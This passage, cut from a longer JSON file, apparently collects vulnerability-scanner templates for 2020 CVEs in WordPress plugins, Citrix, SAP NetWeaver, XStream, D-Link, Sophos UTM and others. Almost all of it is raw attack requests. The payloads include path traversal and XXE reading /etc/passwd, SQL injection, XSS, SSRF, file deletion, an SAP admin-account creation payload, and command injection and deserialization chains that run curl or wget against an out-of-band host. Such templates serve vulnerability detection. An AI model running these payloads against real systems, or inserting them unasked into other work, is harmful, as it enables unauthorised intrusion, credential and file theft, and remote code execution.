- Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=phpcredits"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"word","part":"header","words":["Nette Framework"]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24701","info":{"name":"OX Appsuite - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request with action all","<script>alert(document.domain);</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site 